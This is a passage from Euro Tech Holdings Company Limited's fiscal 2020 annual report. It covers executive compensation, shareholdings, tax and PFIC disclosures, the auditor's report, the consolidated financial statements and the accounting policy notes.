From the Company and its subsidiaries, for services rendered in all capacities to the Company and its subsidiaries during Fiscal 2020, T.C. Leung, the Chairman of the Board and Chief Executive Officer received a yearly salary of US$197,000 (2019: US$197,000, 2018: US$ 193,000), Jerry Wong, Chief Financial Officer received a yearly salary of US$111,000 (2019: 111,000, 2018: US$107,000) and George Hayek, a Key Employee of Yixing, received a yearly salary of US$59,000 (2019: US$59,000, 2018: US$59,000). David YL Leung, a Key Employee of Yixing receives an annual salary of US$147,000 (2019: US$148,000, 2018: US$136,000) and is reimbursed for actual travel and lodging expenses in Shanghai. There is no other information with respect to the compensation paid by the Company and its subsidiaries, for services rendered in all capacities to the Company and its subsidiaries during Fiscal 2020 to the Chairman of the Board and Chief Executive Officer and a Key Employee of the Company. No other executive officer or employee received in excess of US$100,000 as compensation during Fiscal 2020.

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

As stipulated by the rules and regulations in the PRC, the PRC’s subsidiaries contributes to state-sponsored retirement plans for its employees in Mainland China. PRC’s subsidiaries’ contribution approximately 16% of the basic salaries of its employees, and have no further obligations for the actual payment of pension or post-retirement benefits beyond the annual contributions. The state-sponsored retirement plans are responsible for the entire pension obligations payable to retired employees.

During the year ended December 31, 2020 the aggregate contributions of the Group to the aforementioned pension plans and retirement benefit schemes was approximately US$104,000.

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

The Company estimate the fair value of the options granted under the Binomial pricing model at US$2.324 per share.

Changes in outstanding stock options under plans mentioned above were as follows:

	Year ended December 31,
	2020		2019		2018
	Number of Options	Weighted average exercise price	Number of Options	Weighted average exercise price	Number of Options	Weighted average exercise price

Outstanding, beginning of year	51,000	2.60	-	-	-	-
Granted	-	-	51,000	2.60	-	-

Outstanding, end of year	51,000	2.60	51,000	2.60	-	-

Exercisable, end of year	-	-	-	-	-	-

As of December 31, 2020, there was no unrecognized stock-based compensation expense related to unvested stock options. The compensation expense for Fiscal 2020 is US$54,157.

The Group applies the provisions of ASC No. 718-10, which requires to recognise expense related to the fair value of stock-based compensation awards, including employee stock options.

Issuance of Bonus Shares

We issued bonus shares on March 2, 2021 to shareholders of record as of February 23, 2021; such shareholders received two (2) ordinary shares for every three (3) ordinary shares held. All issuances resulting in a fractional share were rounded down to the next whole share.

We issued bonus shares on October 8, 2019 to shareholders of record as of September 23, 2019; such shareholders received one (1) ordinary share for every two (2) ordinary shares held. All issuances resulting in a fractional share were rounded down to the next whole share.

C. BOARD PRACTICES

The term of each of the Company’s directors expires at the election and qualification of their successors at the next annual meeting of the Company’s shareholders, anticipated to be held in September of this year. The Company’s directors were re-elected at the Company’s last annual meeting of shareholders in October 2020. The Board has a standing Audit Committee to assist the Board in carrying out its duties. The Audit Committee has a written charter approved by the Board. The chair of the Audit Committee determines the meeting agenda of the Audit Committee. The Audit Committee members receive materials in advance of Committee meetings allowing them to prepare for the meeting.

The Company had 2 meetings of its Board of Directors during Fiscal 2020, while its Audit Committee had 2 meetings during Fiscal 2020.

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

D. EMPLOYEES

At March 31, 2021, the Company (exclusive of Yixing-Pact) had approximately 43 full-time employees. The Company’s employees are located at Hong Kong and the PRC. At December 31, 2020, 2019 and 2018, staffing levels at the Company (exclusive of Yixing-Pact) were approximately as follows:

	2020	2019	2018
Marketing and sales	13	15	15
Administrative	18	20	22
Technical	14	15	17
Total full time employees	45	50	54

At March 31, 2021, Pact-Yixing had approximately 31 full-time employees. In addition, as of December 31, 2020, 2019 and 2018, respectively, staffing levels at Pact-Yixing were approximately as follows:

	2020	2019	2018
Administrative	8	8	8
Technical	24	28	27
Total full time employees	32	36	35

The Company is not subject to any collective bargaining agreement and believes that its relations with its employees are good. The Company’s Management consists of its officers and directors.

E. SHARE OWNERSHIP

With respect to the share ownership of the directors and senior management of the Company, reference is made to Items 7A “Major Shareholders” and 7B. “Related Party Transactions.”

ITEM 7. MAJOR SHAREHOLDERS AND RELATED PARTY TRANSACTIONS

A. MAJOR SHAREHOLDERS

The following table sets forth, as of March 31, 2021, certain information concerning beneficial ownership of the Company’s voting shares that date, with respect to (i) each person known to the Company to own 5% or more of the outstanding Ordinary Shares, (ii) each director and executive officer of the Company, and (iii) all officers and directors of the Company as a group, based upon 5,154,759 shares of the Company’s Ordinary Shares outstanding as of March 31, 2021. The Company’s major shareholders do not have different voting rights.

	Amount and Nature of Beneficial Ownership(4)	Approximate Percentage Of Ordinary Shares Owned
T.C. Leung (1)	2,659,810	51.6%

Alex Sham(1)	134,302	2.6%

Jerry Wong(1)	87,162	1.7%

Y.K. Liang(1)	—	—

Fu Ming Chen(1)	—	—

Janet Cheang(1)	—	—

David YL Leung	—	—

All Executive Officers And Directors of the Company as a group (7 persons)	2,881,274	55.9%

(1)	The address for the Company’s officers and directors is c/o Euro Tech (Far East) Ltd., Unit D, 18/F., Gee Chang Hong Centre, 65 Wong Chuk Hang Road, Hong Kong.

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

Based upon information received from its transfer agent as of May 3, 2021, the Company believes that it has approximately 21 shareholders of record including 306 beneficial owners of its Ordinary Shares held in nominee names by large clearing houses.

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

HONG KONG

The Company’s subsidiaries organized in Hong Kong, Far East and Euro Tech (China) Limited, provide for Hong Kong profits tax at a rate of 8.25% on assessable profits up to US$256,000; and 16.5% on any part of assessable profits over US$256,000 in 2020 on the basis of their income for financial reporting purposes, adjusting for income and expense items which are not assessable or deductible for profits tax purposes.

PRC

Euro Tech Trading (Shanghai) Limited (“ETTS”), a subsidiary of Far East, provides for PRC Enterprise Income Tax (“EIT”) at a rate of 25% in 2020 after offsetting losses brought forward, if any, on the basis of its income for financial reporting purposes, adjusting for income and expense items which are not assessable or deductible for PRC Enterprise Income Tax purposes. As of December 31, 2020, ETTS had an assessable loss carried forward of US$604,778 as agreed by the local tax authority to offset its profit for the forth coming years. Such loss will expire in 5 years.

Shanghai Euro Tech Limited (“SET”), a subsidiary of Far East, provides for the PRC Enterprise Income Tax of 25% in 2020. As of December 31, 2020, SET had an assessable loss carried forward of US$658,733 as agreed by the local tax authority to offset its profit for the forth coming years. Such loss will expire in 5 years.

Shanghai Euro Tech Environmental Engineering Limited (“SETEE”), a subsidiary of Far East, provides for the PRC Enterprise Income Tax of 25% in 2020. As of December 31, 2020, SETEE had an assessable loss carried forward of US$34,032 as agreed by the local tax authority to offset its profit for the forthcoming years. Such loss will expire in 5 years.

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

Yixing Pact Environmental Technology Co. Ltd. (“Yixing”) provides for PRC Enterprise Income Tax at a rate of 25% in 2020, after offsetting losses brought forward, if any, on the basis of its income for financial reporting purposes, adjusting for income and expense items which are not assessable or deductible for PRC Enterprise Income Tax purposes. As of December 31, 2020, Yixing had an assessable loss carried forward of US$2,304,828 as agreed by the local tax authority to offset its profit for the forth coming years. Such loss will expire in 5 years.

Under the New Enterprise Income Tax Law and the implementation rules, profits of the PRC subsidiaries earned on or after January 1, 2008 and distributed by the PRC subsidiaries to foreign holding company are subject to a withholding tax at a rate of 10% unless reduced by tax treaty. Aggregate undistributed earnings of Far East's subsidiaries located in the PRC that are available for distribution to Far East of approximately US$0.6 million at December 31, 2020 are intended to be reinvested, and accordingly, no deferred taxation has been made for the PRC dividend withholding taxes that would be payable upon the distribution of those amounts to Far East. Distributions made out of pre January 1, 2008 retained earnings will not be subject to the withholding tax.

The items comprising the difference between income taxes computed at the Hong Kong profits tax and PRC EIT statutory tax rates in effect for 2020, 2019 and 2018 and our effective income taxes rates were as follows:

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000

Income / (loss) before income taxes	498	(173)	(373)

Computed tax using respective companies’ statutory tax rates	133	69	254
Change in valuation allowances	48	30	(68)
Under / (over-provision) for income taxes in prior years	-	(5)	131
Non-deductible expenses	(277)	(131)	(5)

Income taxes (expense) / credit at effective tax rate	(96)	(37)	312

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

Under the PRC laws and regulations, the PRC subsidiaries are restricted in their ability to transfer certain of their net assets in the form of dividend payments, loans or advances. The amounts restricted include paid-in capital and statutory reserves, as determined pursuant to PRC generally accepted accounting principles, totaling US$3,174,000 as at December 31, 2020.

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

The annual PFIC determination to be made by a U.S. Holder of our ordinary shares is an inherently factual determination and there is limited guidance regarding the application of the PFIC rules to specific situations. Although the determination of PFIC status is subject to factual uncertainties because it depends upon the valuation of our ordinary shares as well as our goodwill and other assets and income. In addition, as the determination of PFIC status is made on an annual basis and depends on variables over which we have limited control, there can be no assurance that we will not be classified as a PFIC for 2021 or any future calendar years.

If we are determined to be a PFIC for any taxable year, a U.S. Holder could be treated as owning a proportionate share of some of our subsidiaries and, in the absence of certain elections, will subject to special rules that will have a penalizing effect on certain “excess distributions” (as defined).

A U.S. Holder that holds our Ordinary Shares in any year in which we are classified as a PFIC may make a “deemed sale” election with respect to such ordinary shares in a subsequent taxable year in which we are not classified as a PFIC. If you make a valid deemed sale election with respect to your Ordinary Shares, you will be treated as having sold all of your Ordinary Shares for their fair market value on the last day of the last taxable year in which we were a PFIC and such Ordinary Shares will no longer be treated as PFIC stock. You will recognize gain (but not loss), which will be subject to tax as an “excess distribution” received on the last day of the last taxable year in which we were a PFIC. Your basis in the Ordinary Shares would be increased to reflect gain recognized, and your holding period would begin on the day after we ceased to be a PFIC.

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

The Company is currently not exposed to material future earnings or cash flow exposures from changes in interest rates on debt obligations as the Company had no material bank indebtedness in Fiscal 2020. The Company does not currently anticipate entering into interest rate swaps and/or similar instruments.

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

Based upon that evaluation, our Chief Executive Officer and Interim Chief Financial Officer has concluded that our disclosure controls and procedures were effective as of December 31, 2020.

Management’s Annual Report on Internal Control over Financial Reporting

Our management, under the supervision of our Chief Executive Officer and Chief Financial Officer, is responsible for establishing and maintaining adequate internal control over financial reporting as defined in Rule 13a-15(f) and Rule 15d-15(f) of the Exchange Act. Our internal control system was designed to provide reasonable assurance regarding the reliability of financial reporting and the preparation and fair presentation of our consolidated financial statements for external purposes in accordance with generally accepted accounting principles. Our Chief Executive Officer and Chief Financial Officer assessed the effectiveness of our internal control over financial reporting as of December 31, 2020. In making this assessment, they used the criteria established in Internal Control-Integrated Framework issued by the Committee of Sponsoring Organizations of the Treadway Commission (“COSO”). Based on this assessment, our Chief Executive Officer and Chief Financial Officer have concluded that, as of December 31, 2020, our internal control over financial reporting is effective.

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

ITEM 16C. PRINCIPAL ACCOUNTANT FEES AND SERVICES

The following table sets forth the aggregate fees by categories specified below in connection with certain professional services rendered by Union Power HK CPA Limited who was the principal external auditor for fiscal years 2020 and 2019, respectively.

	For the Year Ended December 31
	2020	2019
	US$	US$
Audit fees (1)	160,000	185,000
Audit-related fees(2)	—	—
Tax fees(3)	—	—
All other fees	—	—

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
(2)
“Audit-related fees” means the aggregate fees billed in each of the fiscal years listed for assurance and related services by our principal auditor that are reasonably related to the performance of the audit or review of our financial statements and are not reported under “Audit fees.” Services comprising the fees disclosed under the category of “Audit-related fees” involve principally the performance of certain agreed upon procedures for the years ended December 31, 2020 and 2019, respectively.

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

There were no purchases of registered equity securities in 2020 and 2019.

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

Euro Tech Holdings Company Limited
Reports of Independent Registered Public Accounting Firm
Consolidated Balance Sheets as of December 31, 2020 and 2019
Consolidated Statements of Operations and Comprehensive Income / (Loss) for the years ended December 31, 2020, 2019 and 2018
Consolidated Statements of Cash Flows for the years ended December 31, 2020, 2019 and 2018
Consolidated Statements of Shareholders’ Equity for the years ended December 31, 2020, 2019 and 2018
Notes to the Consolidated Financial Statements

Zhejiang Tianlan Environmental Protection Technology Company Limited
Reports of Independent Registered Public Accounting Firm
Consolidated Balance Sheets as of December 31, 2020 and 2019
Consolidated Statements of Operations for the years ended December 31, 2020, 2019 and 2018
Consolidated Statements of Cash Flows for the years ended December 31, 2020, 2019 and 2018
Consolidated Statements of Shareholders’ Equity for the years ended December 31, 2020, 2019 and 2018
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

EURO TECH HOLDINGS COMPANY LIMITED
(REGISTRANT)

May 13, 2021	By:	/s/ T.C. Leung
T.C. Leung
Chief Executive Officer and Chairman of the Board of Directors
(Principal Executive Officer)

EURO TECH HOLDINGS COMPANY LIMITED

INDEX TO CONSOLIDATED FINANCIAL STATEMENTS

Page
Reports of Independent Registered Public Accounting Firm	F-2 to F-3
Consolidated Balance Sheets as of December 31, 2020 and 2019	F-4
Consolidated Statements of Operations and Comprehensive Income / (Loss) for the years ended December 31, 2020, 2019 and 2018	F-5 to F-6
Consolidated Statements of Cash Flows for the years ended December 31, 2020, 2019 and 2018	F-7
Consolidated Statements of Shareholders’ Equity for the years ended December 31, 2020, 2019 and 2018	F-8
Notes to the Consolidated Financial Statements	F-9 to F-43

Report of Independent Registered Public Accounting Firm

To the Board of Directors and Shareholders of
Euro Tech Holdings Company Limited

Opinion on the Consolidated Financial Statements

We have audited the accompanying consolidated balance sheets of Euro Tech Holdings Company Limited (the “Company”) and its subsidiaries (collectively referred to as the “Group”) as of December 31, 2020 and 2019, the related consolidated statements of operations and comprehensive income / (loss), shareholders’ equity, and cash flows for the year ended December 31, 2020, and the related notes (collectively referred to as the “consolidated financial statements”). In our opinion, the consolidated financial statements present fairly, in all material respects, the consolidated financial position of the Group as of December 31, 2020 and 2019, and the results of its consolidated operations and its consolidated cash flows for each of the three years ended December 31, 2020, in conformity with accounting principles generally accepted in the United States of America.

Basis for Opinion

These consolidated financial statements are the responsibility of the Group’s management. Our responsibility is to express an opinion on the Group's consolidated financial statements based on our audits. We are a public accounting firm registered with the Public Company Accounting Oversight Board (United States) (“PCAOB”) and are required to be independent with respect to the Group in accordance with the U.S. federal securities laws and the applicable rules and regulations of the Securities and Exchange Commission and the PCAOB.

We conducted our audits in accordance with the standards of the PCAOB.  Those standards require that we plan and perform the audit to obtain reasonable assurance about whether the consolidated financial statements are free of material misstatement, whether due to error or fraud. The Group is not required to have, nor were we engaged to perform, an audit of its internal control over financial reporting. As part of our audits, we are required to obtain an understanding of internal control over financial reporting, but not for the purpose of expressing an opinion on the effectiveness of the Group's internal control over financial reporting. Accordingly, we express no such opinion.

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

Critical Audit Matter

The critical audit matter communicated below is a matter arising from the current period audit of the consolidated financial statements that was communicated or required to be communicated to the audit committee and that: (1) relates to accounts or disclosures that are material to the consolidated financial statements and (2) involved our especially challenging, subjective, or complex judgments. The communication of critical audit matters does not alter in any way our opinion on the consolidated financial statements, taken as a whole, and we are not, by communicating the critical audit matter below, providing a separate opinion on the critical audit matter or on the accounts or disclosures to which it relates.

Revenue Recognition

As described further in Note 2 to the consolidated financial statements, revenues derived from long-term contracts in the engineering segments are recognized as the performance obligations are satisfied over time. The Group uses output method to recognize revenue. The Group’s contracts may include variable consideration related to contract modifications through change orders or claims, and management must also estimate the variable consideration the Group expects to receive in order to estimate the total contract revenue. We identified revenue recognized over time to be a critical audit matter.

Report of Independent Registered Public Accounting Firm (Cont’d)

To the Board of Directors and Shareholders of
Euro Tech Holdings Company Limited

Critical Audit Matter (Cont’d)

Revenue Recognition (Cont’d)

The principal considerations for our determination that revenue recognized over time is a critical audit matter is that auditing management’s estimate of the progress toward completion of its projects was complex and subjective. In addition, auditing the Group’s measurement of variable consideration is also complex and highly judgmental and can have a material effect on the amount of revenue recognized.

Our audit procedures related to revenue recognized over time included the following, among others.

●
We obtained an understanding and evaluated the design on the operating effectiveness of the Group’s processes and controls related to contract revenue recognition;
●
We tested the estimated variable consideration by evaluating the appropriate application of the most likely amount method, and tracing amounts to supporting documentation;
●
We evaluating management’s ability to reasonably estimate costs by performing a comparison of the actual costs to prior period estimates, including evaluating the timely identification of circumstances that may warrant a modification to the estimated costs;
●
We evaluate management’s methodologies and the consistency of management’s methodologies over the life of the contracts;
●
We tested the original estimated costs and profit margins on engineering projects that were commenced and completed during the year ended December 31, 2020, by obtaining the original estimates, compare to the actual costs and profit margin for the completed contracts and investigate significant changes; and
●
We tested the estimated costs to complete engineering projects that were not completed during the year ended December 31, 2020 by comparing the estimated cost to complete at December 31, 2020 to actual cost incurred subsequent to December 31, 2020.

/s/ Union Power HK CPA Limited

We have served as the Company’s auditor since 2018.

Hong Kong, the People’s Republic of China
May 13, 2021

EURO TECH HOLDINGS COMPANY LIMITED

CONSOLIDATED BALANCE SHEETS

	December 31,
	2020	2019
	US$’000	US$’000
Assets
Current assets:
Cash and cash equivalents	3,519	5,991
Restricted cash	1,672	658
Accounts receivable, net	3,199	3,586
Prepayments and other current assets	1,514	748
Contract assets	202	441
Inventories	342	586

Total current assets	10,448	12,010

Property, plant and equipment, net	259	700
Investments in affiliates	8,084	7,720
Goodwill	1,071	1,071
Deferred tax assets	-	87
Operating lease right-of-use assets	233	406
Long-term investment	-	148
Restricted cash	-	71

Total non-current assets	9,647	10,203

Total assets	20,095	22,213

Liabilities and shareholders’ equity
Current liabilities:
Bank borrowings	361	565
Accounts payable	2,394	3,914
Contract liabilities	1,063	869
Other payables and accrued expenses	1,593	1,142
Current portion of long-term operating lease obligations	118	170
Income tax payable	4	-

Total current liabilities	5,533	6,660

Deferred tax liabilities	5	-
Long-term operating lease obligations, net of current maturities	94	216

Total non-current liabilities	99	216
Total liabilities	5,632	6,876

Commitments and contingencies (Note 21)

Shareholders’ equity:
Ordinary share, 20,000,000 shares authorized as of December 31, 2020 and 2019, respectively 3,260,559 no par value shares issued as of December 31, 2020 and 2019, respectively	123	123
Additional paid-in capital	9,615	9,561
Treasury stock, 167,700 shares at cost as of December 31, 2020 and 2019, respectively	(786)	(786)
PRC statutory reserves	316	316
Accumulated other comprehensive income	851	899
Retained earnings	3,816	4,346

Total shareholders’ equity attributable to Euro Tech Holdings Company Limited	13,935	14,459
Non-controlling interests	528	878

Total shareholders’ equity	14,463	15,337

Total liabilities and shareholders’ equity	20,095	22,213

The accompanying notes form an integral part of these consolidated financial statements.

EURO TECH HOLDINGS COMPANY LIMITED

CONSOLIDATED STATEMENTS OF OPERATIONS AND COMPREHENSIVE INCOME / (LOSS)

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000
Revenues
Trading and manufacturing	9,476	11,877	13,770
Engineering	3,881	5,522	6,334

Total revenues	13,357	17,399	20,104

Cost of revenues
Trading and manufacturing	(7,048)	(9,285)	(11,136)
Engineering	(2,624)	(3,697)	(5,269)

Total cost of revenues	(9,672)	(12,982)	(16,405)

Gross profit	3,685	4,417	3,699

Finance costs	(12)	(4)	(7)
Selling and administrative expenses	(5,374)	(4,853)	(4,751)

Operating loss	(1,701)	(440)	(1,059)
Interest income	28	83	35
Other income / (losses), net	307	52	58
Gain / (loss) on disposal of property, plant and equipment	1,429	(5)	3
Equity in income / (loss) of affiliates	435	137	(932)
Net gain on disposal of affiliate	-	-	1,522

Net income / (loss) before income taxes	498	(173)	(373)

Income taxes (expense) / credit	(96)	(37)	312

Net income / (loss)	402	(210)	(61)

Net loss attributable to non-controlling interests	367	64	149

Net income / (loss) attributable to Euro Tech Holdings Company Limited’s shareholders	769	(146)	88

Other comprehensive income / (loss)
Net income / (loss)	402	(210)	(61)
Foreign exchange translation adjustments	(31)	(8)	(58)

Comprehensive income / (loss)	371	(218)	(119)
Comprehensive loss attributable to non-controlling interests	350	78	182

Comprehensive income / (loss) attributable to the Company	721	(140)	63

The accompanying notes form an integral part of these consolidated financial statements.

EURO TECH HOLDINGS COMPANY LIMITED

CONSOLIDATED STATEMENTS OF OPERATIONS AND COMPREHENSIVE INCOME / (LOSS) (CONT’D)

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000
Net income / (loss) per ordinary share attributable to Euro Tech Holdings Company Limited’s shareholders
- Basic	$US0.25	$US(0.06)	$US0.04

- Diluted	$US0.25	$US(0.06)	$US0.04

Weighted average number of ordinary shares outstanding
- Basic	3,092,859	2,301,993	2,061,909

- Diluted	3,092,859	2,301,993	2,061,909

The accompanying notes form an integral part of these consolidated financial statements.

EURO TECH HOLDINGS COMPANY LIMITED

CONSOLIDATED STATEMENTS OF CASH FLOWS

	Year ended December 31,
	2020	2019	2018
	US$’000	US$’000	US$’000
Cash flows from operating activities:
Net income / (loss)	769	(146)	88
Adjustments to reconcile net income / (loss) to net cash (used in) / provided by operating activities:
Depreciation	49	69	60
(Gain) / loss on disposal of property, plant and equipment	(1,429)	5	(3)
Stock-based compensation expense	54	10	-
Net gain on disposal of affiliate	-	-	(1,522)
Non-controlling interests in (loss) of subsidiaries	(367)	(64)	(149)
Equity in (profit) / loss of affiliates	(435)	(137)	932
Deferred tax expenses	92	37	34
Changes in non-current assets and liabilities:
Long-term operating lease liabilities	(122)	216	-
Operating lease right-of-use assets	173	(406)	-
Decrease / (increase) in current assets:
Accounts receivable, net	387	1,503	(1,281)
Prepayments and other current assets	(766)	(201)	119
Contract assets	239	458	(705)
Inventories	244	(185)	95
Increase / (decrease) in current liabilities:
Accounts payable	(1,520)	(986)	1,220
Other payables and accrued expenses	451	(108)	249
Contract liabilities	194	(501)	(350)
Income tax payable	4	-	-
Current portion of long-term operating lease obligations	(52)	170	-
Taxes payable	-	-	(132)

Net cash used in operating activities	(2,035)	(266)	(1,345)

Cash flows from investing activities:
Purchase of property, plant and equipment	(11)	(21)	(85)
Proceeds from sale of property, plant and equipment	1,835	-	3
Dividend received from affiliates	71	-	276
Proceeds from sale of affiliate	-	-	4,889
Proceeds from sale of long-term investment	148	-	-
Purchase of long-term investment	-	(148)	-

Net cash provided by / (used in) investing activities	2,043	(169)	5,083

Cash flows from financing activities:
Dividend paid	(1,299)	-	(1,443)
Proceeds from bank borrowings	804	565	1,412
Repayments to bank borrowings	(1,008)	-	(1,509)

Net cash (used in) / provided by financing activities	(1,503)	565	(1,540)

Effect of exchange rate changes on cash and cash equivalents	(34)	(7)	(53)

Net (decrease) / increase in cash and cash equivalents and restricted cash	(1,529)	123	2,145

Cash, cash equivalents and restricted cash at beginning of year	6,720	6,597	4,452

Cash, cash equivalents and restricted cash at end of year	5,191	6,720	6,597

Cash breakdown
Cash and cash equivalents	3,519	5,991	5,267
Restricted cash	1,672	729	1,330

	5,191	6,720	6,597

	US$’000	US$’000	US$’000
Supplemental disclosure of consolidated cash flow information:
Cash paid during the period for income taxes	-	-	-
Cash paid during the period for interest	12	4	7
Operating leases (disclosed in accompanying Note 3)

Non-cash items:
Right-of-use assets obtained in exchange for new operating lease obligations	-	460	-

The accompanying notes form an integral part of these consolidated financial statements.

EURO TECH HOLDINGS COMPANY LIMITED

CONSOLIDATED STATEMENTS OF SHAREHOLDERS’ EQUITY

	EURO TECH HOLDINGS COMPANY LIMITED’S SHARHOLDERS
	Number of ordinary share	Ordinary share	Additional paid-in capital	Treasury stock	Accumulated other com- prehensive income	PRC statutory reserves	Retained earnings	Non-controlling interests	Total
		US$’000	US$’000	US$’000	US$’000	US$’000	US$’000	US$’000	US$’000

Balance at December 31, 2017	2,229,609	123	9,551	(786)	918	352	5,811	1,138	17,107
Net income / (loss)	-	-	-	-	-	-	88	(149)	(61)
Foreign currency translation adjustments	-	-	-	-	(25)	-	-	(33)	(58)
Appropriation of reserves	-	-	-	-	-	(36)	36	-	-
Dividend paid	-	-	-	-	-	-	(1,443)	-	(1,443)

Balance at December 31, 2018	2,229,609	123	9,551	(786)	893	316	4,492	956	15,545
Net loss	-	-	-	-	-	-	(146)	(64)	(210)
Foreign currency translation adjustments	-	-	-	-	6	-	-	(14)	(8)
Bonus shares issued	1,030,950	-	-	-	-	-	-	-	-
Stock-based compensation expense	-	-	10	-	-	-	-	-	10

Balance at December 31, 2019	3,260,559	123	9,561	(786)	899	316	4,346	878	15,337
Net income / (loss)	-	-	-	-	-	-	769	(367)	402
Foreign currency translation adjustments	-	-	-	-	(48)	-	-	17	(31)
Dividend paid	-	-	-	-	-	-	(1,299)	-	(1,299)
Stock-based compensation expense	-	-	54	-	-	-	-	-	54

Balance at December 31, 2020	3,260,559	123	9,615	(786)	851	316	3,816	528	14,463

The accompanying notes form an integral part of these consolidated financial statements.

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

The Group’s principal subsidiaries at December 31, 2020 and 2019 are set out below.

Name of entity	Ownership interest held by the Group		Place of incorporation and principal place of operation	Principal activities
	2020	2019

Euro Tech (Far East) Limited	100%	100%	Hong Kong	Marketing and trading of water and waste water related process control, analytical and testing instruments, disinfection equipment, supplies and related automation systems

Euro Tech (China) Limited	-^	100%	Hong Kong	Inactive

Euro Tech Trading (Shanghai) Limited	100%	100%	The PRC	Marketing and trading of water and waste water related process control, analytical and testing instruments, disinfection equipment, supplies and related automation systems

Shanghai Euro Tech Limited	100%	100%	The PRC	Manufacturing of analytical and testing equipment

Shanghai Euro Tech Environmental Engineering Company Limited	100%	100%	The PRC	Inactive

^ This company was deregistered on April 3, 2020.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

1
Organization and business (Cont’d)

The Group’s principal subsidiaries at December 31, 2020 and 2019 are set out below (Cont’d).

Name of entity	Ownership interest held by the Group		Place of incorporation and principal place of operation	Principal activities
	2020	2019

Yixing Pact Environmental Technology Co., Ltd.	58%	58%	The PRC	Design, manufacturing and operation of water and waste water treatment machinery and equipment

Pact Asia Pacific Limited	58%	58%	The British Virgin Islands	Selling of environmental protection equipment, undertaking environment protection projects and providing relevant technology advice, training and services

Affiliate:

Zhejiang Tianlan Environmental Protection Technology Co. Ltd. (“Blue Sky”)	19.4%*	19.4%*	The PRC	Design, general contract, equipment manufacturing, installation, testing and operation management of the treatment of waste gases emitted

* The Group’s interest in Blue Sky has been counted for as an affiliate using the equity method as the Group has representation on both the Board and Executive Committee of Blue Sky, and the ability to participate in the decision-making process and exercise significant influence.

The outbreak of COVID-19 worldwide and the various public health measures put in place in many countries to prevent the spread of COVID-19 have disrupted the overall business of the Group at different levels of time and regions in 2020. After the Chinese new year in February 2020, the Group’s domestic businesses were affected by the lock-down of various cities implemented in PRC, resulting in the forced suspension of some local operations until the gradual resumption of work beginning from late March to early April 2020. Management continues to evaluate the impact of the COVID-19 pandemic and has concluded that while it is reasonably possible that the virus could have a negative effect on the Group’s consolidated financial position, results of its operations, the specific impact is not readily determinable as of the date of these consolidated financial statements. The consolidated financial statements do not include any adjustments that might result from the outcome of this uncertainty.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies

(a)
Basis of presentation

The accompanying consolidated financial statements are presented in accordance with accounting principles generally accepted in the United States of America (“GAAP”).

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

(d)
Investments in Affiliates

We account for our interest in an investment using the equity method of accounting per Accounting Standards Codification (“ASC”) No. 323, “Investments - Equity Method and Joint Ventures” if we are not the primary beneficiary of a VIE or do not have a controlling interest. The investment is recorded at cost and the carrying amount is adjusted periodically to recognize our proportionate share of income or loss, additional contributions made and dividends and capital distributions received. We record the effect of any impairment or other than temporary decrease in the value of the investment.

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

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(e)
Revenue recognition

Our revenue is derived from long-term contracts for customers in our engineering segment, as well as short-term contracts for customers in our trading and manufacturing segment. Accounting treatment for these contracts in accordance with Accounting Standards Update (“ASU”) 2014-09 (Accounting Standards Codification (“ASC”) Topic 606, Revenue from Contracts with Customer), is as follows:

Performance obligations satisfied over time (Engineering services)

Recognition of performance obligations

A performance obligation is a promise in a contract to transfer a distinct good or service to the customer, and is the unit of account in the new revenue standard. The contract transaction price is allocated to each distinct performance obligation and recognized as revenue when, or as, the performance obligation is satisfied. Engineering service projects typically span between several days to over 5 years. The majority of our contracts have a single performance obligation as the promise to transfer the individual goods or services is not separately identifiable from other promises in the contracts and, therefore, is not distinct. Some contracts have multiple performance obligations, most commonly due to the contract covering multiple phases of the project life cycle (engineering).

Revenues are recognized as our obligations are satisfied over time, by reference to the progress towards complete satisfaction of that performance obligation.

If the Group expects the reference to progress certificates issued by the customers, with additional adjustments where necessary, depicts the Group’s performance in transferring control of goods or services promised to customers for individual projects, the Group satisfies the performance obligation over time and therefore, recognizes revenue over time in accordance with the output method for measuring progress. Under output method, revenue recognition is based on the stage of completion of the contracts, provided that the stage of contract completion and the gross billing value of contracting work can be measured reliably. The stage of completion of a contract is established by reference to the construction works certified by customers.

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

The Group had the following backlog:

	2020	2019
	US$’000	US$’000

Engineering segment	11,581	8,611

Unrecognized contract revenue which is expected to be recognized in next 12 months is approximately US$11,581,000.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(e)
Revenue recognition (Cont’d)

Performance obligations satisfied over time (Engineering services) (Cont’d)

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

Performance obligations satisfied at a point-in-time (Trading and manufacturing)

Revenue for our trading and manufacturing contracts is recognized at a point in time. Sales are recognized when control of the products has transferred, being when the products are delivered to the customer. Delivery occurs when the products have been delivered to the point of receipt by customer.

Rental income

Rental income from operating leases is recognized in consolidated statements of operations and comprehensive income / (loss) on a straight-line basis over the term of the relevant lease.

EURO TECH HOLDINGS COMPANY LIMITED

NOTES TO THE CONSOLIDATED FINANCIAL STATEMENTS (CONT’D)

2
Summary of significant accounting policies (Cont’d)

(f)
Research and development costs

Research and development costs (“R&D” costs) are expensed as incurred. The R&D costs amounted to approximately US$497,000, US$35,000 and US$184,000 for the years ended December 31, 2020, 2019 and 2018 respectively and were included in “Selling and administrative expenses” in the Group’s consolidated statements of operations and comprehensive income / (loss).

(g)
Advertising and promotional expenses

Advertising and promotional expenses (“A&P” expenses) are expensed as incurred. The A&P expenses amounted to approximately US$7,000, US$13,000 and US$16,000 for the years ended December 31, 2020, 2019 and 2018 respectively and were included in “Selling and administrative expenses” in the Group’s consolidated statements of operations and comprehensive income / (loss).

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

The accounting guidance on accounting for uncertainty in income taxes also addresses derecognition, classification, interest and penalties on income taxes, and accounting in interim periods. The Group does not believe it has any uncertain tax positions through the periods ended December 31, 2020, 2019 and 2018 respectively which would have a material impact on the Group’s consolidated financial statements.

The Group files tax returns in Hong Kong and the PRC. The tax returns for 2020, 2019 and 2018 are subject to examination by Hong Kong and PRC taxing authorities, commencing with the first year filed.

(i)
